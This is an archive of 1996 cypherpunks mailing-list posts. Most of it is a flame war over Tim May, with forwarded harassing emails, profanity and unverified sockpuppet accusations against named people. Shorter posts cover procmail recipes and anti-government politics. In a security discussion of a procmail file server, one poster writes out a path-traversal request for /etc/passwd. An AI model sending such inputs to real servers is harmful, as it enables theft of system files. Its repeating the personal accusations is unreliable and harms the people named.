> ]> > ]> Bachus told Waters the hearing wasn't motivated by politics and that he > ]> > ]> --- > ]> > ]> Dr.Dimitri Vulis KOTM > ]Fuckhead. If it is more widespread than those two, perhaps you are being Detweilled? He seems to enjoy that sort of thing. > Is this any more readable? See, I put a ']' in front of the quoted material. Yeah, great! Only one more thing, use ellipses [...] to show large volumes of stuff which isn't relevant to your current point, and your quoting style is A1. (eg most of the body of your quoted [NEWS] item for the purposes of this discussion could have been ellipsed out). Some friendly advice for you if you care to take it: if you care about your reputation, I'd recommend dropping the Tim May is a liar, and the crude insults, that should halt the recent drop in your reputation. If you feel you have a legitimate complaint, you make your case better by avoiding insults. Also once things die down, or sooner (I'd prefer sooner for the sake of my per second BT phone line charges :-), stop forwarding any email to cypherpunks, and you're ready for some serious crypto discussion. The email forwarding is what seems to have caused most complaints. People do pay attention when positive contributions are made, for instance I think I remember that you posted some time ago a way to have two plausible decryptions for one cyphertext, to enable things like duress keys, in terms of RSA. The problem with this, however is that RSA is currently very slow to use in its pure form for messages. Adam -- #!/bin/perl -sp0777i Message-ID: On Sun, 22 Sep 1996, Dale Thorn wrote: > in the U.S., that govt. is your agent, carrying out your > representatives' instructions, and paid with your tax dollars. Unless Er, the US is a winner takes all election, in which the candidate with the most votes, may still have less than 50% of the votes cast ---which is usually the case. 
> and until this becomes a literal dictatorship (and there is a valid De Jure, the US is a military dictatorship. << That the enabling legislation is hardly in force is another matter, entirely. >> > argument that it applies even then), you are responsible for whatever > your paid agents do, from the street cop to the top politico. That being the case, then AP is the only way to effectively vote against them. Which probably would be a _very good_ thing. None of those paid agents have any legitimate functions. xan jonathon grafolog at netcom.com In the fight against terrorism, let us remember the biggest terrorist of them all --- the united states of america, which exports more death, destruction and mayhem than the rest of the world combined. From adam at homeport.org Sun Sep 22 09:49:24 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 23 Sep 1996 00:49:24 +0800 Subject: How to use procmail In-Reply-To: <199609220423.XAA00811@manifold.algebra.com> Message-ID: <199609221455.JAA15169@homeport.org> Igor Chudov @ home wrote: | Adam Shostack wrote: | > :0 | > * From bal at swissnet.ai.mit.edu | > { | > :0E | > | pgp +batchmode -fka | | Isn't this vulnerable to "deadbeef" attacks? I can also see an attack when | someone sends you an email with the spoofed "From " address and a user | name that is the same (or almost the same) as that of your trusted parties. | Then I can send you a bogus email containing a key for mrx at bogus.com | and next time you encrypt something for your friend nrx at provider.com, | you will actually encrypt it with the wrong key. If I intercept your | email, your message to mrx can be compromised. Yes it's vulnerable. I might see it in the logs, but I've personally verified most of the keys I care about, and they carry my signature, at least on my local keyring. | > # basic file server. Only sends what's in .outbound | > :0 | > * ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$ | > * !^Subject:.*[ /.]\. 
| > * !^FROM_DAEMON | > { | > # FILE=`formail -x Subject: | sed 's/.* //'` | > FILE=`sed -n -e '/Subject:/s/.* //p' -e '/^$/q'` | > | > :0c | > | (formail -rt -A"Precedence: junk";\ | > cat $HOME/.outbound/$FILE) | $SENDMAIL -t | | *If* .outbound has some subdirectories (say subdir), How about this email: | | From: dumbass at aol.com | Subject: GET subdir/../../../../etc/passwd | Reply-To: blin at algebra.com That will fail in the second subject line: * !^Subject:.*[ /.]\. Subject: does not match '/' or '.' followed by '.' The first Subject: line prevents absolute pathnames. * ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$ So, AFAIK, you can't get anything but real subdirectories. Feel free to install it on localhost & experiment. I was pretty careful when I wrote it to make it safe. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From dlv at bwalk.dm.com Sun Sep 22 10:04:52 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 23 Sep 1996 01:04:52 +0800 Subject: Timmy May's spam (Was: Re: CIA hacked) In-Reply-To: <199609220707.IAA00335@server.test.net> Message-ID: Adam Back writes: > > > It would seem to me that the first insults were thrown by yourself, > > > and that your strange habit of bouncing all the fallout to the list is > > > perpetuating the problem. > > > > No. Let me remind you the sequence of events, in chronological order: > > > > 1. Timmy May (who picked up a few popular PKC buzzwords, doesn't know > > anything about crypto, and isn't interested in learning) started spamming > > this mailing list with political rants > > I don't think this at all fair; if you've read his cyphernomicon, you > will see that he has a perfectly good understanding of crypto. His On the contrary. Timmy has only a passable understanding of some aspects of public-key crypto. He knows nothing about symmetric crypto and conventional attacks. He even argued that practitioners don't need to learn any crypto outside of PKC. 
(One of the things I don't like about Americans in their propensity to take pride in their ignorance and lack of education. :-) > strong point as I see it however, is that he was one of the first to > think deeply about the implications of strong crypto, and document > this in a fairly comprehensive manner. This is a central topic for > cypherpunks, after all: cypherpunks are trying to achieve poltical > ends via strong crypto, crypto isn't being discussed in isolation, as > a purely scientific endeavour. sci.crypt with its charter is more > this. > > Also, I would point out that you yourself don't restrict yourself to > purely crypto discussions (aside from this latest war), you for > instance recently discussed driving licenses in NY. Not that I am Right - the discussion of drivers licences and other credentials is definitely crypto-relevant. The discussion, e.g., of the ethics of mandatory insurance is not. My notion of crypto-relevance is fairly broad. E.g. I find the assassination politics discussion to be crypto-relevant and sometimes very interesting, and I kicked the ass of Alan Olsen and a few other assholes who tried to suppress it. I am very much interesting not only in the technical discussion of crypto, but also in the implication of its use, which would be off-topic for sci.crypt (fwiw). There's a difference between discussing privacy and ranting about unfair taxation of rich old farts like Timmy May. > complaining, or think this is especially inappropriate, as the topic > of Chaumian credentials, and the current state of state mandated > credentials I consider on topic, but you are criticizing others for > analysing politics. The [NEWS] series, also (I've already said I > consider these useful), are hardly pure discussion of crypto, if this > were your only concern. Really? I was trying to pull out only the stories which obvious crypto relevance. I'd be curious to know some examples of what in these series you consider not to be crypto-relevant. 
Perhaps I made a mistake somewhere. In particular, I consider _any discussion of electronic cash or money laundering to be crypto-relevant. > > 2. Most people who used to discuss crypto work on this mailing list > > have unsubscribed. > > True, and unfortunate. coderpunks feels somewhat reminiscent of how > cypherpunks used to be in this regard, try subscribing to that, if you > are uninterested in political aspects, and have not already. I > subscribe to both, because I think politics is also important, as well > as churning out code, and just read very selectively on cypherpunks. I have been subscribed to coderpunks almost since its beginning. It has some interesting discussion. Unfortunately most of the folks who left the original cypherpunks have not re-subscribed to coderpunks. > > 6. Recently it came to my attention that Tim's been contacting off-list > > various people in the computer security field and "complaining" about > > the politically incorrect things that I supposedly say on the Internet > > - except that he made up most of the "things" he complained about. > > I don't think it's near as serious as you are worrying about, all I > heard him say was something about not understanding the motive for the > (spit) stuff. Hardly complaining, more a passing comment on your > posting style than a complaint of "political incorrectness". I'm not "worried", since Timmy May has already earned the reputation of a nutcase and a liar in these circles, and is hardly in a position to "assassinate" anyone's character. However I am somewhat angry that several people I respect approached me in a short period of time and said something to the effect, "You know, Timmy May's been complaining to me about what you write on the Internet." Subsequent investigation revealed that he's been complaining not even about the things I did say (plenty of which are "politically incorrect"), but about things Timmy May himself made up - see quotes below. > > 8. 
Since that time, several friends of Tim May (or maybe Tim himself, > > using multiple accounts) have been sending me harrassing e-mail, often > > by quoting my own cypherpunks articles and adding an obscenity. > > It appears that Chris Adams started this. And > others confused by the quoting, presumed it was you. (Especially > since the headers were yours, as you were forwarding them.) Also the > fact that you were forwarding these emails probably would get you > complaints anyway, even if the quoting had made it clear what was > going on. How do you know that "Chris Adams" is a real person separate from Timmy? I rather doubt that someone other than Timmy himself would go into trouble "defending" Timmy, let alone three separate people. > > 9. Tim himself continues flaming me and telling lies about me (see his > > recent rant with the subject "death threats"). > > I guess you mean the purely fictitious Valdimir G Nulis :-) A cross > between Vladimir Z Nuri (who many consider to be Detweiller) and > yourself. I've corresponded with L.D. and he's a very bright and knowledgeable person. Timmy May lies when he claims that VZNuri (who's an idiot) could possibly be his "tentacle". You really should get to know L.D. better before you repeat the lies Timmy May spreads about him. > I don't really see what you're complaining about: it's really oblique, > and tame compared to your recent perfectly direct, and somewhat crude > insults to Tim. > > > And you see, Timmy May is an obsessive liar and a vindictive nutcase. > > I don't see the liar, nor the nutcase. I haven't noticed him say > anything which I considered untrue, nor have any of his posts appeared > nutty. I suspect that you haven't been following this discussion for long. Here's a recent quote from myself: ]Despite the name, there's practically no crypto discussions on the list. A few ]weeks ago someone mentioned elliptic curves, and there was an outcry of how ]it's "off-topic". 
Instead the mailing list is flooded with rants and personal ]attacks from Tim May, who knows next to nothing about cryptography, and whose ]long-winded diatribes in support of child pornography, drugs, and Harry Browne ]have absolutely no crypto relevance. Tim's off-topic spews have driven Eric ]Hughes, John Gilmore, Rich Salz, and many other former valuable contributors ]off the mailing list. Today's Cypherpunks don't write code - they write lies ]and personal attacks. I'll quote a couple of Tim May's unprovoked personal ]attacks against me to illustrate the kind of traffic found on the Cypherpunks ]mailing list (as opposed to cryptography discussions): ] ]>Message-Id: ]>To: ichudov at algebra.com (Igor Chudov) ]>From: tcmay at got.net (Timothy C. May) ]>Subject: Lying Purebred Sovok Tchurkas Write the History of the Net ]>Cc: cypherpunks at toad.com ]> ]>At 4:17 AM 7/18/96, Igor Chudov @ home wrote: ]> ]>>Knowing KGB habits as pertaining to releasing information to the public, ]>>I would expect 50% of the CDROM to be pure bullshit, 40% -- lies, and ]>>maybe 10% truth that was already publicly available. ]>> ]>>It is like buying a CDROM about the history of the Net from Dr. Grubor. ]>>Maybe it would be interesting and amusing, but not worth $120. ]> ]>NOW you tell me! I just shelled out $42 for "The History of the Net," by ]>Dr. John Grubor and Dr. Dmitri Vulis, 1996. ]> ]>And here I thought it was the real history of the Net, especially the part ]>about how "the dandruff-covered Peter Vorobieff (spit) conspired with the ]>purebred Sovok Valery Fabrikant (spit) to spread the lies of the Jew ]>cripples dying of AIDS in Sovok-controlled clinics." ]> ]>When Grubor and Vulis speak of the Usenet Cabal being a Sovok (spit) plot, ]>I thought this was the actual truth. I guess not. Maybe Spafford is ]>actually Rabbi Ruthenberg. 
]> ]>--Tim May ]> ]>(hint: this a satire, based on the writings of Vulis, who speaks of people ]>as "lying purebred Sovok Tchurkas" (whatever _they_ are), and attaches the ]>charming word "(spit)" after nearly every person he references.) ] ]I responded to Tom May stating that I've never called anybody a (t)churka (I'm ]not even quite sure who or what they are) and asked him to retract his false ]claims. Tim May never retracted, but continued to post more lies about me and ]to attribute to me various nonsense I never wrote. But Tim May's attempts at ]"character assassination" don't stop at the cypherpunks mailing list: recently ]three separate people whom I respect (unlike Tim May) and who work in the ]computer security field told me that Tim May has been complaining to them ]"off-list" about my submissions to the Cypherpunks mailing list. ] ]Here's another recent example of a personal attack Tim May posted to the list: ] ]>Message-Id: ]>Mime-Version: 1.0 ]>Content-Type: text/plain; charset="us-ascii" ]>To: cypherpunks at toad.com ]>From: tcmay at got.net (Timothy C. May) ]>Subject: Reputation Systems in Action ]>Sender: owner-cypherpunks at toad.com ]>Precedence: bulk ]> ]>At 6:41 PM 9/11/96, paul at fatmans.demon.co.uk wrote: ]>>> tcmay at got.net (Timothy C. May) writes: ]>>> > As to "tasteless and insulting," a matter of personal perspective. I find ]>>> > it helpful to call a spade a spade, and others apparently do as well. ]>>> > ]>>> ]>>> Of course, Tim gets very uncomfortable when others call a spade a spade. ]>> ]>> ]>>This constant character assasination of Tim is getting rather boring, ]>>as far as I can see, and I read all of the posts on the list, he has ]>>done nothing more than ignore posts from these idiots, that is his ]>>choice and nothing to do with anyone else. ]> ]>But this latest episode illustrates the role of reputations. Namely, my own ]>reputation is not being harmed by bizarre commentaries from the Vulis-bot. 
]>As its reputation is (apparently) pretty low, and associated with Serdar ]>Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity ]>can hardly "assassinate" my character. ] ]Again, Tim May is lying. I am not interested in "assassinating" his character. ]He is the one spreading lies about me and attributing to me various nonsense I ]never said. Tim May shows his true colors when he faults me for my defense of ]Serdar Argic's freedom of speech. Unfortunately, Serdar has been silent for ]over two years, but that doesn't stop censorous liars like Tim May from ]continuing their vendetta against those who defended free speech. ] ]>A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx," ]>aka "Pablo Escobar," aka several other alternate personalities, wrote ]>dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc. ]>Did this have an effect on our reputations? Not to people I respected, of ]>course. And if Detweiler's rants affected my reputation with his peers, ]>including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic, ]>well, this is to the good. ] ]We keep catching Tim May in major lies: ] ]1. Tim May attributes to me things I never said. ] ]2. Tim May was caught lying about Kelly Goen. ] ]3. Tim May is lying about Detweiler. As far as I know, Detweiler never had any ]problems with Eric Hughes et al, and Hughes doesn't have a problem with ]Detweiler. The only person Detweiler has a problem with is Tim May. Detweiler ]is 100% correct in saying that Tim May is an ignorant liar and a crook. ] ]4. Sovok VZNuri is not Detweiler - even Tim May doesn't believe his own lies. ] ]5. Archimedes (former Ludwig) Plutonium and Doctress Libby Neutopia know a lot ]more about cryptography and are far more truthful than Timothy C. May. ] ]>In the mathematics of reputations, a negative reputation held by one whose ]>own reputation is negative is a positive. 
] ]_If it's true, then my reputation benefits from being slandered by the proven ]liar Tim May. Does this answer your questions about Timmy May's veracity? > > > If reporting to the list is accurate, I hear you have a PhD with a > > > subject related to crypto, so presumably you would have ample > > > knowledge to contribute technical crypto related thoughts. I'm sure > > > people would be interested in anything along those lines you cared to > > > contribute, and your reputation would benefit, > > > > I still hope to be able discuss crypto on this mailing list (yes, my Ph.D. > > thesis was about crypto), but I see two problems: > > > > 1. A lot of people have already left this list, unwilling to be subjected > > to Tim May's rants, lies, and personal attacks. If I post something crypto- > > relevant to this mailing list, they won't see it. > > The decision to keep the list open was made for reasons I agree with, > censoring people is not the way to promote open discussions. > Censoring people is something cypherpunks are strongly against in > other forums, so it would seem especially hypocritical for cypherpunks > to censor the list itself. No more hypocritical than to have a "cypherpunks meetings" with specific persons excluded because someone doesn't like their political views. 
Here's a threat I found in our 'orphan' mailbox: ]From paul at fatmans.demon.co.uk Thu Sep 19 23:39:14 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Fri, 20 Sep 96 01:23:58 EDT ] for paul at fatmans.demon.co.uk ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA02597 for dvl at bwalk.dm.com; Thu, 19 Sep 96 23:39:14 -0400 ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ah16490; ] 19 Sep 96 17:22 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa18174; 19 Sep 96 17:06 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843059897 ; Wed, 18 Sep 96 15:18:17 +0000 ]Comments: Authenticated sender is ]From: paul at fatmans.demon.co.uk ]To: dvl at bwalk.dm.com ]Date: Wed, 18 Sep 1996 15:18:16 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: A daily warning regarding Timothy C. May ]Priority: normal ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <843149202.18174.0 at fatmans.demon.co.uk> ] ] ]> Timothy C. May is a lying sack of shit. ] ]Look, that is enough, I`m going to move to have you removed from the ]list if you keep this up... get a life fuckhead, if you are going to ]flame at least do it from your real address so people can killfile ]you, or maybe you believe censorship is better? 
] ] ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Http://www.fatmans.demon.co.uk/crypt/ ] "Don`t forget to mount a scratch monkey" ] (The idiot misspelled 'dvl' for 'dlv'.) Who could possibly be in the position to threaten to "remove" people from this mailing list? (Hint: he rants a lot.) > > 2. Here's an example of the net-abuse being perpetrated by Tim May and his > > merry gang of mailbombers. I posted some crypto-relevant wire clippings > > to this mailing list. Either Tim (using an alternate account) or some pal > > of his e-mailed it back to me with an obscenity appended. > > > > ]From adamsc at io-online.com Thu Sep 19 00:00:57 1996 > ^^^^^^^^^^^^^^^^^^^^ > why is this in part of your own headers? > > > ]Received: by bwalk.dm.com (1.65/waf) > > ] via UUCP; Thu, 19 Sep 96 00:49:21 EDT > > ]From: Troy Varange > > and this too? Is this as a result of threading, or are you quoting > part of another message? Or is it a forgery? 
I've apparently received similar e-mail spam from the following addresses: varange at crl.com paul at fatmans.demon.co.uk adamsc at io-online.com The most recent incident involved about 20 identical mailbombs from the latter one. Obviously no one can tell whether they're forged or whether the e-mail really came from these addresses. I suspect that there's just one person behind these very similar attacks, and that this person also posts stupid rants from got.net. You probably weren't around when Timmy May waged a flame war against L.D. which involved Timmy setting up a legion of "artificial persons" designed to show massive support for Timmy's side. This is nothing new. > > ]Subject: Re: [NEWS] Crypto-relevant wire clippings > > ]> [...] > > ]> CIA-backed rebels in Nicaragua played in bringing crack cocaine and > > ]> weapons to Los Angeles and other cities. > > ]> > > ]> Bachus told Waters the hearing wasn't motivated by politics and that he > > ]> > > ]> --- > > ]> > > ]> Dr.Dimitri Vulis KOTM > > ]Fuckhead. > > If it is more widespread than those two, perhaps you are being > Detweilled? He seems to enjoy that sort of thing. Timmy May seems to enjoy this sort of thing since he has no life and too much free time on his hands. L.D. is a perfectly reasonable guy and he'd never do such a thing to me. However I doubt that there are so many distinct people involved in mailbombing me. > People do pay attention when positive contributions are made, for > instance I think I remember that you posted some time ago a way to > have two plausible decryptions for one cyphertext, to enable things > like duress keys, in terms of RSA. The problem with this, however is > that RSA is currently very slow to use in its pure form for messages. I don't recall this one... 
My feeling about RSA is that one of these days there will be a breakthrough allowing much faster factorization (either through a better algorithm on a conventional computer, or by a practical quantum computer) and then all the codes based on factorization will become essentially plaintext. It's time to start looking for other hard problems to base PKC on. E.g., does anyone know of any progress made on public-key cryptosystems based on the word problem in semigroups, described in Neal Wagner and Marianne Magyarik, _A public key cryptosystem based on the word problem_, Advances in Cryptology: Proceedings of Crypto '84, G. R. Blakley and D. Chaum, eds., Lecture Notes in Computer Sciences #196, Springer Verlag, 1985, and also mentioned in Wayne Patterson, _Mathematical Cryptology for Computer Scientists and Mathematicians_, Rowman and Littlefield, 1987? From what I heard, NSA tried very hard to implement it and failed, and the Soviets actually built a cryptosystem similar to what they described. I tried to duplicate what the Soviets supposedly did, but without success. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jya at pipeline.com Sun Sep 22 10:22:10 1996 From: jya at pipeline.com (John Young) Date: Mon, 23 Sep 1996 01:22:10 +0800 Subject: WEB_spy Message-ID: <199609221448.OAA22284@pipe2.ny3.usa.pipeline.com> 9-22-96. WaPo: "In California, Creating a Web of the Past" Brewster Kahle's massive data-collection devices and programmed computers are surfing and saving everything they can find on the global computer network. At the end of this year that then will be updated as fast as his computers can do their vacuum cleaning, likely every few months. But the project also has piqued the interest of privacy rights advocates and copyright lawyers, who question how the archive will use its data. "I'm dealing with every single intellectual property issue out there," Kahle said. 
"Privacy, copyright, pornography, import-export -- we've got it all." He is forming a for-profit venture that will sell the Web searching and storing technology developed at the archives. Researchers from AT&T Corp. and Xerox Corp. have asked to study the archive. ----- http://jya.com/webspy.txt (7 kb) WEB_spy From dlv at bwalk.dm.com Sun Sep 22 11:00:23 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 23 Sep 1996 02:00:23 +0800 Subject: Continuing spam from Timmy May (or one of his clones) Message-ID: Here's today's sample. I'm becoming more convinced that it's Timmy May him/her/ itself, since he/she/it complains about being called Timmy. Can someone please take a look at the headers and see if they appear to be forged from got.net? ]From paul at fatmans.demon.co.uk Sun Sep 22 10:59:25 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 22 Sep 96 11:03:58 EDT ] for dlv ]Received: from uumx.smtp.psi.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA19743 for dlv at bwalk.dm.com; Sun, 22 Sep 96 10:59:25 -0400 ]Received: from relay-2.mail.demon.net by uumx.smtp.psi.net (8.6.12/SMI-4.1.3-PSI) ] id KAA19486; Sun, 22 Sep 1996 10:59:00 -0400 ]From: paul at fatmans.demon.co.uk ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac22319; ] 22 Sep 96 15:23 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa17044; 22 Sep 96 15:19 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843329591 ; Sat, 21 Sep 96 18:13:11 +0000 ]Comments: Authenticated sender is ]To: "Dr.Dimitri Vulis KOTM" ]Date: Sat, 21 Sep 1996 18:13:06 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: CIA hacked ]Priority: normal ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <843401964.17044.0 at fatmans.demon.co.uk> ] ] ]His name is Tim, or maybe you never learnt proper manners. ] ] ]> You are confused. 
The above question was e-mailed to me by one of Timmy May's ]> friends. I just forward their e-mail to this mailing list. I don't read it. ]> If you have any comments about Timmy May's friends not knowing English, ]> trying to insult people, and posting non-crypto-relevant political rants, ]> address them to Timmy May and his friends. ]> ]> --- ]> ]> Dr.Dimitri Vulis KOTM ]> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps ]> ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Http://www.fatmans.demon.co.uk/crypt/ ] "Don`t forget to mount a scratch monkey" ] Here the Timmy May clone comments on his own previous e-mail to me: ]From paul at fatmans.demon.co.uk Sun Sep 22 10:22:38 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 22 Sep 96 11:03:51 EDT ] for dlv ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA18447 for dlv at bwalk.dm.com; Sun, 22 Sep 96 10:22:38
-0400 ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac21657; ] 22 Sep 96 15:21 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa17072; 22 Sep 96 15:19 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843327445 ; Sat, 21 Sep 96 17:37:25 +0000 ]Comments: Authenticated sender is ]From: paul at fatmans.demon.co.uk ]To: "Dr.Dimitri Vulis KOTM" ]Date: Sat, 21 Sep 1996 17:37:23 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: CIA hacked ]Priority: normal ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <843401979.17072.0 at fatmans.demon.co.uk> ] ]> >Dr. John M. Grubor created the 'net. ]> ]> Who created you? You tub of shit? ] ] ]Fuck you and fuck your cheap ass fucked up life motherfucker (look ]for the fuck redundancy index here, should be an interesting figure, ]motherfucker) ] ]good day to you ] ] ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Http://www.fatmans.demon.co.uk/crypt/ ] "Don`t forget to mount a scratch monkey" ]
]From paul at fatmans.demon.co.uk Sun Sep 22 10:23:35 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 22 Sep 96 11:03:52 EDT ] for dlv ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA18472 for dlv at bwalk.dm.com; Sun, 22 Sep 96 10:23:35 -0400 ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ae22319; ] 22 Sep 96 15:23 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa17051; 22 Sep 96 15:19 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843329594 ; Sat, 21 Sep 96 18:13:14 +0000 ]Comments: Authenticated sender is ]From: paul at fatmans.demon.co.uk ]To: "Dr.Dimitri Vulis KOTM" ]Date: Sat, 21 Sep 1996 18:13:06 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: Re: CIA hacked ]Priority: normal ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <843401966.17051.0 at fatmans.demon.co.uk> ] ] ]This is a further post following an earlier flame: ] ]> You are being flamed because. ]> ]> [X] you continued a boring useless stupid thread ]> [ ] you repeatedly posted to the same thread that you just posted to ]> [x] you repeatedly initiated incoherent, flaky, and mindless threads ]> [ ] you posted a piece riddled with profanities ]> [ ] you advocated Net censorship ]> [ ] you SCREAMED!
(used all caps) ]> [x] you posted some sort of crap that doesn't belong in this group ]> [ ] you posted the inanely stupid 'Make Money Fast' article ]> [ ] you threatened others with physical harm ]> [x] you made a bigoted statement(s) ]> [x] you repeatedly assumed unwarranted moral or intellectual superiority ]> [x] you are under the misapprehension that this list is your preserve ]> [ ] you repeatedly shown lack of humor ]> [ ] you are apparently under compulsion to post to every thread ]> [x] you are posting an anonymous attack ]> ]> >>> Thank you for the time you have taken to read this. Live n' Learn.<<< ] ]Furthermore, you qualify as the celebrity fuckhead of the week, have ]a nice day. ] ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Http://www.fatmans.demon.co.uk/crypt/ ] "Don`t forget to mount a scratch monkey" ] ]From paul at fatmans.demon.co.uk Sun Sep 22 10:51:12 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 22 Sep
96 11:03:58 EDT for dlv ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA19533 for dlv at bwalk.dm.com; Sun, 22 Sep 96 10:51:12 -0400 ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ad22319; ] 22 Sep 96 15:23 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa17045; 22 Sep 96 15:19 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843329593 ; Sat, 21 Sep 96 18:13:13 +0000 ]Comments: Authenticated sender is ]From: paul at fatmans.demon.co.uk ]To: "Dr.Dimitri Vulis KOTM" ]Date: Sat, 21 Sep 1996 18:13:06 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: Dimitri Spams ]Priority: normal ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <843401965.17045.0 at fatmans.demon.co.uk> ] ] ]Killifiling you would be a pleasure, however, it is an even greater ]pleasure to be able to flame you because of your worthless posts, ]this is probably why he didn`t... ] ]Get a life. ] ] ]> > Dimitri, get a life! We need Dimitri Spams as much as we needed ]> > Perrygrams. Which is to say, we need them not at all! ]> ]> I see you lied when you claimed to have killfiled me. 
]> ]> --- ]> ]> Dr.Dimitri Vulis KOTM ]> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps ]> ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Http://www.fatmans.demon.co.uk/crypt/ ] "Don`t forget to mount a scratch monkey" ] --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From frissell at panix.com Sun Sep 22 11:08:34 1996 From: frissell at panix.com (Duncan Frissell) Date: Mon, 23 Sep 1996 02:08:34 +0800 Subject: Going AP Shit on the Internet Message-ID: <3.0b19.32.19960922114342.00b00688@panix.com> At 01:06 AM 9/22/96 -0700, Dale Thorn wrote: >If you live >in the U.S., that govt. is your agent, carrying out your >representatives' instructions, and paid with your tax dollars.
Unless >and until this becomes a literal dictatorship (and there is a valid >argument that it applies even then), you are responsible for whatever >your paid agents do, from the street cop to the top politico. >whether you, I, or Joe Blow is more guilty, for lack of participation or >some other citizen crime, but you can't put all the blame on your hired >agents for their crimes, when you know very well what kinds of things >they do, and you continue to fund them. You have to be considered an >accessory, at least. I hereby dismiss all employees of the federal, state, or local governments who may be working as my employees or agents and specifically disclaim all actions they take on my part. Note, BTW that your argument is the same as saying "If one pays taxes, one is subject to Nurenberg liability for government crimes." Which is therefore an argument in favor of tax evasion. DCF From dlv at bwalk.dm.com Sun Sep 22 11:57:12 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 23 Sep 1996 02:57:12 +0800 Subject: Going AP Shit on the Internet In-Reply-To: Message-ID: jonathon writes: > In the fight against terrorism, let us remember the > biggest terrorist of the all --- the united states of > america, which exports more death, destruction and mayhem > that the rest of the world combined. Hear, hear. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jimbell at pacifier.com Sun Sep 22 12:00:57 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 23 Sep 1996 03:00:57 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: <199609221638.JAA09586@mail.pacifier.com> At 12:56 AM 9/22/96 -0400, Rabid Wombat wrote: > > >On Sat, 21 Sep 1996, jim bell wrote: > >> At 01:51 PM 9/17/96 -0700, Steve Schear wrote: >> >>On Mon, 16 Sep 1996, Steve Schear wrote: >> >> >> >>> Someone wrote: >> >>> We've all heard these arguments, but are they true? 
